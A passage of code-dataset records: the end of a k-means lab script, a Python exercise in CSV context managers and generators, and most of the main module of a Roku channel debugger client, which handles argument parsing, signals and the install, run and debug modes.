Instead, we check the ordered assignments of the\n # clusters:\n new_assign_values = sorted(new_assign.values())\n moved = assign_values != new_assign_values\n\n assign = new_assign\n assign_values = new_assign_values\n\n # Saves the new prototypes\n with open(outdir.joinpath(\"prototypes%d.txt\" % (i + 1)), \"w\") as f:\n for key in new_proto:\n f.write(\n key\n + \":\"\n + \" \".join(map(lambda x: f\"{x[0]}+{x[1]}\", new_proto[key]))\n + \"\\n\"\n )\n\n # Saves the new assignments\n with open(outdir.joinpath(\"assignments%d.txt\" % (i + 1)), \"w\") as f:\n for key, value in new_assign.items():\n f.write(key + \":\" + \" \".join(value) + \"\\n\")\n\n # If there is no changes in two consecutive iteration we can stop\n if not moved:\n print(\"Algorithm converged\")\n break\n\n print(f\"Time= {(time.time() - tinit)} seconds\")\n","repo_name":"Leixb/IRRS-labs","sub_path":"lab4/MRKmeans.py","file_name":"MRKmeans.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35364758624","text":"# project 5\nfrom collections 
import namedtuple\nfrom contextlib import contextmanager\nfrom itertools import islice\nimport csv\n\n#goal 1\nclass ctx_manager:\n def __init__(self, fname):\n self._fname = fname # storage of file name\n self._f = None # file object\n\n ### Iterator protocol\n def __iter__(self):\n return self\n\n def __next__(self):\n row = next(self._f) # eager eval!!!\n row = row.strip(self.dialect.lineterminator).split(self.dialect.delimiter)\n return self.Data(*row)\n ###\n\n ### Context manager protocol\n def __enter__(self): # opening file and doing additional utilities for iteration and processing data\n self._f = open(self._fname, 'r')\n sample = self._f.read(1000)\n self.dialect = csv.Sniffer().sniff(sample) # detecting dialect\n self._f.seek(0)\n self.header = next(self._f).strip(self.dialect.lineterminator).split(self.dialect.delimiter) # figuring out header in entring\n self.Data = namedtuple('Data', self.header) # preparing namedtuple\n return self\n\n def __exit__(self, exc_type, exc_value, exc_trace):\n if not self._f.closed:\n self._f.close()\n else:\n raise StopIteration\n return False\n ###\n'''\nwith ctx_manager('cars.csv') as d:\n for i in d:\n print(i)\n'''\n\n#goal 1 refactor after solution\nclass ctx_manager_ref:\n def __init__(self, fname):\n self._fname = fname # storage of file name\n self._f = None # file object\n\n ### Iterator protocol\n def __iter__(self):\n return self\n\n def __next__(self): \n return self.Data(*next(self._reader))\n ###\n\n ### Context manager protocol\n def __enter__(self): # opening file and doing additional utilities for iteration and processing data\n self._f = open(self._fname, 'r')\n sample = self._f.read(1000)\n self.dialect = csv.Sniffer().sniff(sample) # detecting dialect\n self._f.seek(0)\n self._reader = csv.reader(self._f, self.dialect)\n self.header = next(self._reader) # figuring out header\n self.Data = namedtuple('Data', self.header) # preparing namedtuple\n return self\n\n def __exit__(self, exc_type, exc_value, exc_trace):\n if not self._f.closed:\n self._f.close()\n else:\n raise StopIteration\n return False\n ###\n\nwith ctx_manager_ref('cars.csv') as d:\n for i in islice(d, 5):\n print(i)\n\n\n#goal 2\ndef detect_dialect(f):\n sample = f.read(1000)\n dialect = csv.Sniffer().sniff(sample)\n f.seek(0)\n return dialect\n\n@contextmanager\ndef opener(fname, mode='r'):\n f = open(fname, mode)\n try: \n yield f\n finally:\n f.close()\n\ndef yielder_gen():\n with opener('personal_info.csv', 'r') as d:\n dialect = detect_dialect(d)\n Data = namedtuple('Data', next(d).strip(dialect.lineterminator).split(dialect.delimiter))\n for record in d:\n yield Data(*record.strip(dialect.lineterminator).split(dialect.delimiter))\n\n'''\nproduct = yielder_gen()\n\nfor i in range(10):\n print(next(product))\n'''\n\n\n#goal 2 - refactor after solution\ndef detect_dialect_ref(f):\n sample = f.read(1000)\n dialect = csv.Sniffer().sniff(sample)\n f.seek(0)\n return dialect\n\n@contextmanager\ndef opener_ref(fname, mode='r'):\n f = open(fname, mode)\n try: \n ltr = detect_dialect_ref(f).lineterminator # everything should be inside try block to check every operation on file passed #unused csv.reader again - good/bad?\n dlm = detect_dialect_ref(f).delimiter\n Data = namedtuple('Data', next(f).strip(ltr).split(dlm))\n yield (Data(*record.strip(ltr).split(dlm)) for record in f) \n finally:\n f.close()\n\n'''\nwith opener_ref('cars.csv', 'r') as d:\n for i in islice(d, 5):\n print(i)\n 
'''","repo_name":"ezopezo/deepdive","sub_path":"2_iter_gen/project5/project5.py","file_name":"project5.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12096134889","text":"import argparse, atexit, datetime, enum, inspect, ipaddress, os, pathlib\nimport platform, signal, sys, tempfile, time, threading, traceback\n\n# SystemExit only exits the current thread, so call it by its real name\nThreadExit = SystemExit\n\n########################################################################\n# GLOBAL CONFIGURATION\n# This module is the main entry point for this package. Set up global\n# config used by all modules.\n# This must be done, PRIOR to importing other classes from this package.\n########################################################################\nclass GlobalConfig(object):\n def __init__(self):\n # Add all attributes here, to make it clear what this object contains.\n # All values will be set when a RokuDebug instance is created.\n # done loading.\n\n # Data\n self.debug_level = 0 # global, may be bumped up locally\n self.verbosity = None\n\n # functions\n self.do_exit = None # function: always use this to exit\n self.set_exit_code = None # function: Override exit_code passed to do_exit()\n self.get_is_exiting = None # function: is rokudebug exiting?\n self.get_monotonic_time = None\n self.get_version_str = None\n\nglobal_config = GlobalConfig()\nsys.modules['__main__'].global_config = global_config\nfrom .model import Verbosity # done after main.global_config set\nglobal_config.verbosity = Verbosity.NORMAL\n########################################################################\n\n# Local imports\nfrom tempfile import mkstemp\nfrom .model import AppInstallerClient\nfrom .model import DebuggerClient\nfrom .model import DebugUtils\nfrom .model import FakeDebuggerClient # used for debugging\nfrom .model import LibrarySourceSpecifier\nfrom .model import MonotonicClock\nfrom .model import ProtocolFeature\nfrom .model import SourceCodeInspector\nfrom .model.testmgr import NullTestManager, TestManager\nfrom .model import Verbosity\nfrom .model import get_supported_protocols_str, check_debuggee_protocol_version\nfrom .cli import CommandLineInterface\nfrom .dap import DebugAdapterProtocol\n\n# When changing the version number, be sure to update SOFTWARE_REVISION_TIMESTAMP\nVERSION_MAJOR = 3 # int major\nVERSION_MINOR = 2 # int minor\nVERSION_PATCH_LEVEL = 0 # int patch level\n\n# Software revision timestamp is similar to a build number, and is primarly\n# used to differentiate between pre-release builds. 
It is milliseconds since\n# 1970-01-01T00:00:00.000Z (64 bits) and must be updated when any change is\n# made that may affect the behavior of this program.\n# Calculate timestamp on linux: date -u +%s%3N or expr 1000 \\* `date -u +%s`\nSOFTWARE_REVISION_TIMESTAMP = 1675444061659 # 64-bit long int\n\n# We treat signals as names because not all enum values are\n# available on all platforms\nCTRL_BREAK_EVENT_LITERAL = 'CTRL_BREAK_EVENT'\nCTRL_C_EVENT_LITERAL = 'CTRL_C_EVENT'\nSIGHUP_LITERAL = 'SIGHUP'\nSIGINT_LITERAL = 'SIGINT'\nSIGTERM_LITERAL = 'SIGTERM'\n\n_rokudebug_main = None\n\n# Validated set of options from the command line\nclass RokuDebugOptions(object):\n def __init__(self):\n self.channel_file = None\n self.dap_log_file_path = None\n self.no_execute = False\n self.run_mode = RunMode.CLI\n self.stop_target_on_launch = False\n self.target_ip = None\n self.target_pass = None\n\n@enum.unique\nclass RunMode(enum.IntEnum):\n DAP = enum.auto() # Run as a Debug Adapter Protocol server/bridge\n CLI = enum.auto() # Go to command-line interface, don't load channel\n DEBUG = enum.auto() # Upload and run the channel, attach to debuggee. go to CLI\n REMOVE = enum.auto() # Remove installed channel\n RUN = enum.auto() # Upload and run the channel, do not attach to debuggee\n\n def to_option_str(self):\n return '--{}'.format(self.name.lower()) # pylint: disable=no-member\n\n def to_user_str(self):\n return self.name.lower() # pylint: disable=no-member\n\n\n# This is the primary entry point for this script. Must be a global singleton.\nclass RokuDebug(object):\n __lifecycle_lock = threading.RLock()\n __lifecycle_cond_var = threading.Condition(lock=__lifecycle_lock)\n\n def __init__(self):\n with RokuDebug.__lifecycle_lock:\n self.__init_nolock()\n\n def __init_nolock(self):\n global _rokudebug_main\n assert not _rokudebug_main # enforce singleton\n self._debug_level = 0 # debug level for this object\n\n self.__orig_stdin = None # set in main()\n self.__orig_stderr = None # set in main()\n self.__orig_stdout = None # set in main()\n\n self.options = RokuDebugOptions()\n\n # REMIND: These should be moved to the module, so that do_exit()\n # will work when there is no global object instance.\n self._exit_now = False\n self._exit_cond_var = threading.Condition(lock=threading.Lock()) # main thread waits on this\n self._exit_code = None # None is not 0\n\n self.__tmp_dir = None # Created iff needed, use self.get_tmp_dir_path()\n self.__test_mgr = None # Always exists, may have no tests\n self.__lib_sources = [] # Source not in channel package (e.g., a library)\n self.__test_dirs = [] # Directories to load tests from\n self.__run_test_name = None # Name of test to auto-run on startup\n self.__debug_fake_connection = False\n self.__interface_thread = None # runs cli, set in main()\n self.__monotonic_clock = None # set in main()\n self.__debugger_client = None\n self.__cli = None # Command-line interface\n self.__dap = None # Debug Adapter Protocol (IDE integration)\n\n # output controller has four stream-like attributes:\n # localout, localerr, targetout, targeterr\n self.__output_controller = None\n\n # protected with RokuDebug.__lifecycle_lock\n self.__is_shut_down = False\n self.__is_cli_running = False\n\n # Unsupported signals will have a value of None\n self.__signal_name_to_enum = {\n CTRL_BREAK_EVENT_LITERAL:None,\n CTRL_C_EVENT_LITERAL:None,\n SIGHUP_LITERAL:None,\n SIGINT_LITERAL:None,\n SIGTERM_LITERAL:None\n }\n self.__valid_signals = {'C'}\n\n self.__tmp_files = [] # automatically deleted 
upon exit\n\n # Set global attributes, used by other modules\n global_config.get_monotonic_time = self.get_monotonic_time\n global_config.get_version_str = self.get_version_str\n # global_config.do_exit was set when this module was loaded\n\n # module-global reference used by signal handlers and maybe others\n _rokudebug_main = self\n\n def main(self):\n try:\n try:\n return self.__main_impl()\n except ThreadExit: raise\t# Normal exit\n except BaseException as e:\n print('INTERNAL ERROR: Exception in main():')\n traceback.print_exc(file=sys.stderr)\n # do_exit() raises ThreadExit exception on this main (non-daemon) thread\n do_exit(1, 'INTERNAL ERROR: exception in main(): {}'.format(e))\n except ThreadExit as e:\n # Normal shutdown path - exiting this thread exits the process\n # Wait for all daemon threads to exit, because if they try\n # to print anything while this thread terminates, the python\n # interpreter will have a hissy fit and dump a core.\n self.shutdown()\n raise e\n raise AssertionError('Should not reach this line')\n\n def __main_impl(self):\n atexit.register(exit_handler)\n self.__install_signal_handlers()\n self.__orig_stdin = sys.stdin\n self.__orig_stderr = sys.stderr\n self.__orig_stdout = sys.stdout\n self.__parse_args()\n\n if self.options.no_execute:\n self.__validate_files_and_exit()\n\n self.__monotonic_clock = MonotonicClock(global_config.debug_level)\n self.__print_startup_info()\n self.__init_test_mgr()\n\n if self.options.run_mode == RunMode.DAP:\n self.__dap = DebugAdapterProtocol(self.__orig_stdin,\n self.__orig_stdout)\n self.__dap.start()\n else:\n self.__interface_thread = threading.Thread(\n name='Interface', target=self, daemon=True)\n self.__interface_thread.start()\n\n # Idle and wait for events, signals, and interrupts. This thread\n # sits idle because only this initial/main thread can exit this\n # process cleanly, because sys.exit() (and the ThreadExit exception)\n # are ignored on other threads. 
Also, python will deliver all\n # signals to this initial/main thread.\n if self.__check_debug(3):\n print('debug:main: main() idling...')\n with self._exit_cond_var:\n while not self._exit_now:\n # As a backup, poll periodically without a cond_var\n # notification.\n self._exit_cond_var.wait(5)\n\n if self.__check_debug(2):\n print('debug: main thread exits')\n do_exit(0)\n # END main_impl()\n\n # Invoked with --no-execute to validate files in self.options\n # Exits script, never returns\n def __validate_files_and_exit(self):\n options = self.options\n assert options.no_execute\n if options.run_mode in (RunMode.DEBUG, RunMode.RUN):\n assert options.channel_file\n path = pathlib.Path(options.channel_file)\n err_msg = None\n if path.is_dir():\n err_msg = 'Is a directory (not a file): {}'.format(path)\n elif not os.access(path, os.R_OK):\n err_msg = 'File does not exist, or is not readable: {}'.format(\n path)\n if err_msg:\n if global_config.verbosity >= Verbosity.ERRORS_ONLY:\n print(err_msg, file=sys.stderr)\n do_exit(1)\n if global_config.verbosity >= Verbosity.NORMAL:\n print('Would {}: {}'.format(\n options.run_mode.to_user_str(), path))\n do_exit(0)\n\n # Called on self.__interface_thread\n def __call__(self):\n try:\n self.__run_interface()\n except ThreadExit: raise\n except: # Yes, catch EVERYTHING\n traceback.print_exc()\n global_config.do_exit(1, 'INTERNAL ERROR: Uncaught exception')\n\n # Called on self.__interface_thread\n def __run_interface(self):\n if self.__check_debug(2):\n print('debug: rdb.__run_interface(), mode={}'.format(\n self.options.run_mode.name))\n if self.options.channel_file:\n if not SourceCodeInspector(self.options.channel_file).verify():\n do_exit(1, 'ERROR: Bad channel file: {}'.format(\n self.options.channel_file))\n\n installer = AppInstallerClient(self.options.target_ip,\n self.options.target_pass)\n\n if self.options.run_mode == RunMode.CLI:\n self.__start_plain_cli(installer)\n elif self.options.run_mode == RunMode.DEBUG:\n self.__debug_channel(installer)\n elif self.options.run_mode == RunMode.REMOVE:\n self.__remove_channel(installer)\n elif self.options.run_mode == RunMode.RUN:\n self.__run_channel(installer)\n else:\n raise AssertionError(\n 'INTERNAL ERROR: bad run mode: {}'.format(self.options.run_mode))\n\n do_exit(0)\n\n def get_monotonic_time(self):\n return self.__monotonic_clock.get_time()\n\n def get_tmp_dir_path(self):\n with self.__lifecycle_lock:\n if not self.__tmp_dir:\n self.__tmp_dir = tempfile.TemporaryDirectory(prefix='rrdb_')\n return self.__tmp_dir.name\n\n def __install_signal_handlers(self):\n # MS-Windows (and probably other platforms) don't support signals,\n # or may have different signal symbols/numbers. 
Let's try each\n # one and handle failure gracefully\n for sig_name in self.__signal_name_to_enum.keys():\n self.__install_one_signal_handler(sig_name)\n\n def __install_one_signal_handler(self, signame):\n sig = None\n err = None\n try:\n sig = getattr(signal, signame, None)\n if not sig:\n raise ValueError(signame)\n signal.signal(sig, _global_signal_handler)\n except Exception:\n err = 'signal not supported on platform (ignored): {}'.format(\n signame)\n if global_config.debug_level >= 5:\n print('debug: main: DUMPING EXCEPTION (IGNORED):')\n print(traceback.format_exc())\n\n if global_config.debug_level >= 1:\n if err:\n print('debug: main: {}'.format(err))\n else:\n print('debug: main: signal handler installed: {}'.format(signame))\n\n self.__signal_name_to_enum[signame] = sig\n\n # Upon return, self.options will be in a consistent state, with\n # no conflicting options. If a consistent state could not be achieved\n # with the provided command-line options, exits this script with\n # an error.\n def __parse_args(self):\n self.__program_name = os.path.basename(sys.argv[0])\n use_help_str = ' Use --help for help'\n options = self.options\n\n ################################################################\n # PRIORITY ARGUMENT PARSING\n # Process arguments that take effect early and affect the behavior\n # of other options, regardless of their order on the command line.\n ################################################################\n\n\n ##### PRIORITY 0 ARGS #####\n # Arguments that affect other arguments, regardless of order\n\n # If Debug Adapter Protocol (DAP) is specified, stdin/stdout\n # are used for the protocol and NO other I/O can go to those\n # streams. Redirect immediately.\n add_arg_dap = lambda parser: \\\n parser.add_argument('--dap', dest='dap',\n action='store_true', default=False,\n help = 'Expect Debug Adapter Protocol on stdin/stdout.'\n ' (IDE Integration)')\n\n add_arg_dap_log_file = lambda parser: \\\n parser.add_argument('--dap-log', dest='dap_log_file_path',\n action='store', type=str, default=None,\n help='Output file for errors and warnings, when in DAP mode')\n\n # Never redirect anything if --no-execute specified\n add_arg_no_execute = lambda parser: \\\n parser.add_argument('--no-execute', '-n',\n action='store_true', default=False,\n help='Validate command-line arguments, but do not'\n ' perform any actions')\n\n parser = argparse.ArgumentParser(add_help=False)\n add_arg_dap(parser)\n add_arg_dap_log_file(parser)\n add_arg_no_execute(parser)\n args, _ = parser.parse_known_args()\n\n if args.dap:\n options.run_mode = RunMode.DAP\n raise NotImplementedError(\n 'Sorry, the Debug Adapter Protocol (DAP)'\n ' needs maintenance and has been disabled')\n if args.dap_log_file_path:\n if options.run_mode != RunMode.DAP:\n do_exit(1, '--dap-log only valid with --dap')\n else:\n if args.dap:\n do_exit(1, '--dap requires --dap-log')\n options.dap_log_file_path = args.dap_log_file_path\n options.no_execute = args.no_execute\n\n if options.run_mode == RunMode.DAP:\n self.__redirect_for_dap() # if no_execute, only validates\n\n # Avoid using stale objects, below\n _ = None\n parser = None\n args = None\n\n\n ##### PRIORITY 1 ARGS #####\n # More options that affect other options, regardless of order\n\n def add_arg_debug_level(parser, include_help):\n help_arg = 'Debug this script: 1=silent validation, 2-10=more output' \\\n if include_help else argparse.SUPPRESS\n parser.add_argument('--debug-level', dest='debug_level', type=int,\n action='store',default=0,\n 
help=help_arg)\n\n def add_arg_debug(parser, include_help=True):\n help_arg = 'Upload, run, and debug channel (default)' \\\n if include_help else argparse.SUPPRESS\n parser.add_argument('--debug', dest='debug_channel',\n action='store_true',default=False,\n help = help_arg)\n\n def add_arg_long_help(parser, include_help):\n help_arg = 'Show long help with debugging and test options, then exit' \\\n if include_help else argparse.SUPPRESS\n parser.add_argument('--long-help', dest='long_help',\n action='store_true',default=False,\n help=help_arg)\n\n parser = argparse.ArgumentParser(add_help=False)\n add_arg_debug_level(parser, False)\n add_arg_long_help(parser, False)\n # --debug is not a high-priority arg, but it needs to be here\n # so that it is ignored for now, rather than being interpreted\n\t\t# as --debug-level.\n add_arg_debug(parser, False)\n args, _ = parser.parse_known_args()\n\n # Global debug level (can be overridden in modules)\n global_config.debug_level = args.debug_level # global debug level\n\n if options.run_mode == RunMode.DAP and self.__check_debug(2):\n print('debug: Testing stdout redirect to DAP log')\n print('debug: Testing stderr redirect to DAP log', file=sys.stderr)\n\n show_long_help_and_exit = args.long_help\n\n # Make sure we don't use stale objects, below\n parser = None\n args = None\n _ = None\n\n\n\n ################################################################\n # Normal argument parsing\n # All of the options are parsed here, so that they will all show\n # up in help. Some options may be re-parsed, but the result\n # should be identical.\n ################################################################\n\n #\n # Define arguments\n # ArgumentParser help lists these arguments, in the order they\n # are added.\n parser = argparse.ArgumentParser()\n parser.description = 'Client for the Roku debugging protocol'\n add_arg_long_help(parser, True)\n add_arg_dap(parser)\n add_arg_dap_log_file(parser)\n add_arg_debug(parser)\n add_arg_no_execute(parser)\n parser.add_argument('--remove', dest='remove_channel',\n action='store_true', default=False,\n help = 'Remove the installed channel')\n parser.add_argument('--run','-r', dest='run_channel',\n action='store_true',default=False,\n help = 'Upload and run the channel, but do not debug it')\n parser.add_argument('--stop-on-launch', '-s',\n dest='stop_target_on_launch',\n action='store_true',default=False,\n help = 'Stop target immediately upon launch, allows'\n ' breakpoints to be set prior to execution'),\n parser.add_argument('--targetip','-t', dest='target_ip',\n action='store',type=str,\n help='IP Address of the target Roku device.'\n ' If not specified, looks at ROKU_DEV_TARGET'\n ' environment variable.')\n parser.add_argument('--targetpass','-p', dest='target_pass',\n action='store',type=str,\n help='Password for the target device app installer.'\n ' If not specified, looks at 1) ROKU_DEV_PASSWORD'\n ' environment variable, 2) DEVPASSWORD env var.'\n ' 3) If still not found, interactively'\n ' asks for password.')\n # REMIND: Add better descriptions of verbosity levels\n parser.add_argument('-v', dest='verbosity',\n action='count',default=Verbosity.NORMAL.value,\n help = 'Increase verbosity by one (may be used multiple times)')\n parser.add_argument('--verbosity', dest='verbosity',\n action='store',default=Verbosity.NORMAL.value,type=int,\n help = 'Set verbosity level 0=silent|1=errors|2=normal|3=high')\n\n parser.add_argument('--version', '--Version', '-V', dest='print_version',\n 
action='store_true',default=False,\n help='Print version of this program and exit')\n\n # Collect the channel file path\n parser.add_argument('channel_file', nargs='?')\n\n ################################################################\n # Options that only appear with --long-help\n # --debug-* arguments are used to debug this script.\n add_arg_debug_level(parser, show_long_help_and_exit)\n parser.add_argument(\"--debug-fake-connection\", dest='debug_fake_connection',\n action='store_true', default=False,\n help='Don\\'t sideload channel, go straight into command-line with fake connection.'\\\n ' Useful when developing this script'\n if show_long_help_and_exit else argparse.SUPPRESS)\n\n # allow breakpoints like \"components/KeyHandler.brs\" w/o lib: or pkg: URI scheme\n parser.add_argument('--debug-preserve-breakpoint-path',\n dest='debug_preserve_breakpoint_path',\n action='store_true', default=False,\n help='Don\\'t add pkg: and lib: prefixes to breakpoint paths'\\\n if show_long_help_and_exit else argparse.SUPPRESS)\n\n # load additional source directory\n parser.add_argument('--add-lib-src', dest='lib_src',\n action='append', default=[],\n help='Add source for library: \"mylibname:/path/to/source\"'\n ', may be used multiple times')\n\n # load external tests\n # dest appears in help, so name it accordingly: --add-test-dir TEST_DIR\n parser.add_argument('--add-test-dir', dest='test_dir',\n action='append', default=[],\n help='Load external tests, may be used multiple times'\\\n if show_long_help_and_exit else argparse.SUPPRESS)\n\n # load external tests\n # dest appears in help, so name it accordingly: --run-test TEST_NAME\n parser.add_argument('--run-test', dest='test_name', type=str,\n action='store', default=None,\n help='Run an externally-loaded test'\\\n if show_long_help_and_exit else argparse.SUPPRESS)\n\n ################################################################\n\n if show_long_help_and_exit:\n parser.parse_args(['--help'])\n if self.__check_debug(1):\n raise AssertionError('parse_args() did not exit')\n args = parser.parse_args()\n\n #\n # Validate and commit arguments\n #\n\n # debuglevel has already been set, above\n\n if (args.print_version):\n do_exit(0, '{} {}'.format(\n self.__program_name, self.get_version_str(True)))\n\n # Stop on launch\n options.stop_target_on_launch = args.stop_target_on_launch\n\n # Target IP\n target_ip = args.target_ip\n if not target_ip:\n target_ip = os.environ.get('ROKU_DEV_TARGET', None)\n if target_ip:\n try:\n options.target_ip = ipaddress.ip_address(target_ip)\n except Exception:\n do_exit(1, 'bad target IP: {}.'.\n format(target_ip)+use_help_str)\n else:\n do_exit(1, '--targetip not specified, no environment variables found.' 
+ use_help_str)\n options.target_ip = target_ip\n\n # Target app installer password\n target_pass = args.target_pass\n if not target_pass:\n target_pass = os.environ.get('ROKU_DEV_PASSWORD', None)\n if not target_pass:\n target_pass = os.environ.get('DEVPASSWORD', None)\n if not target_pass:\n import getpass\n target_pass = getpass.getpass('Password for {}: '.format(options.target_ip))\n options.target_pass = target_pass\n\n # Verbosity\n global_config.verbosity = Verbosity.from_int(args.verbosity)\n\n # Channel operation (debug/run, mutually exclusive)\n # channel_required must be set for each operation\n run_modes_selected = []\n if args.dap:\n channel_required = False\n options.run_mode = RunMode.DAP\n run_modes_selected.append(options.run_mode.to_option_str())\n if args.debug_channel:\n channel_required = True\n options.run_mode = RunMode.DEBUG\n run_modes_selected.append(options.run_mode.to_option_str())\n if args.remove_channel:\n channel_required = False\n options.run_mode = RunMode.REMOVE\n run_modes_selected.append(options.run_mode.to_option_str())\n if args.run_channel:\n channel_required = True\n options.run_mode = RunMode.RUN\n run_modes_selected.append(options.run_mode.to_option_str())\n if args.test_name:\n channel_required = False\n options.run_mode = RunMode.DEBUG\n run_modes_selected.append('--run-test')\n\n if not len(run_modes_selected):\n if args.channel_file:\n options.run_mode = RunMode.DEBUG\n channel_required = True\n if global_config.verbosity >= Verbosity.HIGH:\n print('info: no mode specified for channel, defaulting to --debug')\n else:\n options.run_mode = RunMode.CLI\n channel_required = False\n if global_config.verbosity >= Verbosity.HIGH:\n print('info: no mode and no channel specified, going to command line')\n run_modes_selected.append(options.run_mode.to_option_str())\n elif len(run_modes_selected) > 1:\n msg = 'Options are incompatible: {}'.format(' '.join(run_modes_selected))\n do_exit(1, msg)\n mode_arg = run_modes_selected[0]\n\n # channel_file\n if args.channel_file:\n if not channel_required:\n do_exit(1, 'channel file not allowed with {}.{}'.format(mode_arg, use_help_str))\n self.options.channel_file = args.channel_file\n else:\n if channel_required:\n do_exit(1, 'Channel file required with {}.{}'.format(mode_arg, use_help_str))\n self.options.channel_file = None\n\n self.__debug_fake_connection = args.debug_fake_connection\n if self.__debug_fake_connection:\n global_config.debug_level = max(global_config.debug_level, 1) # 1 = internal validation\n\n for lib_src_spec in args.lib_src:\n try:\n self.__lib_sources.append(LibrarySourceSpecifier(lib_src_spec))\n except ValueError as e:\n do_exit(1, 'bad library source specifier: {}'.format(e))\n\n if args.test_dir:\n self.__test_dirs = args.test_dir\n global_config.debug_level = max(global_config.debug_level, 1) # 1 = internal validation\n if args.test_name:\n self.__run_test_name = args.test_name\n global_config.debug_level = max(global_config.debug_level, 1) # 1 = internal validation\n\n self.__debug_preserve_breakpoint_path = args.debug_preserve_breakpoint_path\n if self.__debug_preserve_breakpoint_path:\n global_config.debug_level = max(global_config.debug_level, 1) # enable debug validation\n\n # END __parse_args()\n\n # REQUIRES: valid attributes self.options.dap,dap_log_file_path,no_execute\n # If no_execute, only verifies that log file is writeable\n # Exits this script if any error occurs\n def __redirect_for_dap(self):\n assert self.__orig_stdin\n assert self.__orig_stderr\n assert 
self.__orig_stdout\n assert self.options.run_mode == RunMode.DAP\n assert self.options.dap_log_file_path # required with dap\n path = pathlib.Path(self.options.dap_log_file_path)\n if self.options.no_execute:\n if path.is_dir():\n do_exit(1, 'DAP log path is a directory (not a file): {}'.format(path))\n if path.exists():\n if not os.access(path, os.W_OK):\n do_exit(1, 'DAP log file is not writeable: {}'.format(path))\n else:\n if not os.access(path.parent, os.W_OK):\n do_exit(1, 'Directory not writeable: {}'.format(path.parent))\n else:\n try:\n new_out = open(path, mode='w')\n except OSError as e:\n do_exit(1, 'Could not write to {} ({})'.format(\n path, e.strerror))\n sys.stdout = new_out\n sys.stderr = new_out\n\n def __print_startup_info(self):\n needs_hrule = global_config.debug_level >= 1 or global_config.verbosity >= Verbosity.HIGH\n if needs_hrule:\n print('------------------------------------------------------')\n if (global_config.debug_level >= 1):\n print('debug: debuglevel: {}'.format(global_config.debug_level))\n print('debug: validation: internal validation enabled (debuglevel > 0)')\n print('debug: verbosity: {}({})'.format(\n global_config.verbosity.name, global_config.verbosity.value))\n if (global_config.verbosity >= Verbosity.HIGH) or (global_config.debug_level >= 2):\n if global_config.verbosity >= Verbosity.HIGH:\n pre = 'info: '\n else:\n pre = 'debug: '\n print('{} {:>18s}: {}'.format(\n pre, self.__program_name, self.get_version_str()))\n print('{} verbosity: {}({})'.format(\n pre, global_config.verbosity.name.lower(), global_config.verbosity.value))\n print('{} this o.s.: {}'.format(\n pre, ' '.join(platform.uname())))\n print('{} targetip: {}'.format(pre, self.options.target_ip))\n print('{} targetpass: {}'.format(pre, self.options.target_pass))\n print('{}supported protocols: {}'.format(\n pre, get_supported_protocols_str()))\n if self.__lib_sources:\n for lib_src in self.__lib_sources:\n print('{} lib source: {}'.format(\n pre, lib_src))\n if self.__test_dirs:\n print('{} test dirs: {}'.format(\n pre, ', '.join(self.__test_dirs)))\n if self.__run_test_name:\n print('{} auto-run test: {}'.format(pre, self.__run_test_name))\n if needs_hrule:\n print('------------------------------------------------------')\n\n sys.stdout.flush() # Helpful when stdout redirected\n\n # [int,int,int,[int-or-string]] get_version()\n # Get the version number as an array. 
If includeBuild is False, returns:\n # [int major, int minor, int patchlevel]\n # If includeBuild is True, returns:\n # [int major, int minor, int patchlevel, int-or-string buildID]\n # The buildID is only included if includeBuild is True, and it may\n # be an int, or it may be a string (e.g., 'localbuild').\n @staticmethod\n def get_version(includeRevision=False):\n version = [VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH_LEVEL]\n if includeRevision:\n version.append(SOFTWARE_REVISION_TIMESTAMP)\n return version\n\n @staticmethod\n def get_version_str(includeRevision=False):\n versionString = '{}.{}.{}'.format(\n VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH_LEVEL)\n if includeRevision:\n rev_str = DebugUtils.revision_timestamp_to_str(SOFTWARE_REVISION_TIMESTAMP)\n versionString += ' ' + rev_str\n return versionString\n\n # Start the command-line interface without launching a channel\n def __start_plain_cli(self, app_installer):\n if self.__check_debug(2):\n print('debug: start_plain_cli()')\n self.__cli = CommandLineInterface(self.options.channel_file,\n self.__lib_sources, self.__output_controller,\n self.options.stop_target_on_launch, self.__test_mgr,\n self.__debug_preserve_breakpoint_path)\n\n with self.__lifecycle_lock:\n self.__is_cli_running = True\n try:\n self.__cli.interact(app_installer, None)\n finally:\n with self.__lifecycle_lock:\n self.__is_cli_running = False\n self.__lifecycle_cond_var.notify_all()\n\n def __debug_channel(self, app_installer):\n if self.__check_debug(2):\n print('debug: debug_channel()')\n\n # Create the debugger client\n dclient = None\n self.__cli = CommandLineInterface(self.options.channel_file,\n self.__lib_sources, self.__output_controller,\n self.options.stop_target_on_launch, self.__test_mgr,\n self.__debug_preserve_breakpoint_path)\n if self.__debug_fake_connection:\n if global_config.verbosity >= Verbosity.NORMAL:\n print('info: NOT side-loading channel, because --debug-fake-connection')\n self.__debugger_client = FakeDebuggerClient(self.__cli.update_received)\n dclient = self.__debugger_client\n else:\n app_installer.remove()\n app_installer.install(self.options.channel_file, remote_debug=True)\n self.__debugger_client = \\\n DebuggerClient(self.options.target_ip,\n self.__cli.update_received, sys.stdout)\n dclient = self.__debugger_client\n dclient.connect()\n self.__check_protocol_version(dclient, print_warnings=True)\n\n # Verify test is compatible with target\n test = self.__test_mgr.get_current_test()\n if test:\n protocol_version = self.__debugger_client.get_protocol_version()\n if protocol_version < test.min_protocol_version:\n print('ERROR: Incompatible protocol, required={},actual={}'.format(\\\n test.min_protocol_version.to_user_str(True),\n protocol_version.to_user_str(True)))\n global_config.do_exit(1, 'Incompatible protocol')\n del test, protocol_version\n\n # Start the interface\n if self.__check_debug(2):\n print('debug: stop on launch: {}'.format(\n self.options.stop_target_on_launch))\n\n with self.__lifecycle_lock:\n self.__is_cli_running = True\n try:\n self.__cli.interact(app_installer, self.__debugger_client)\n finally:\n with self.__lifecycle_lock:\n self.__is_cli_running = False\n self.__lifecycle_cond_var.notify_all()\n\n def __remove_channel(self, app_installer):\n app_installer.remove()\n\n def __run_channel(self, app_installer):\n app_installer.remove()\n app_installer.install(self.options.channel_file, remote_debug=False)\n\n # Exits this script if the target's protocol version is not supported\n def 
